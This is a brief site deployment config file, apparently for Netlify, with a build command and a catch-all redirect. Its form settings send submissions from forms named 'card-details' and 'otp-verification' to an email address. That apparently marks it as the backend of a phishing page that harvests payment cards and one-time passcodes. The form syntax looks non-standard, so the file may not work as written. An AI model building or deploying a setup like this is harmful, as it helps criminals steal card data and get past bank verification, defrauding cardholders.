
[build]
  publish = "dist"
  command = "bun run build"

[[redirects]]
  from = "/*"
  to = "/index.html"
  status = 200

[form]
  settings = { forms = { "card-details" = { to = "hmsil@example.com" }, "otp-verification" = { to = "hmsil@example.com" } } }
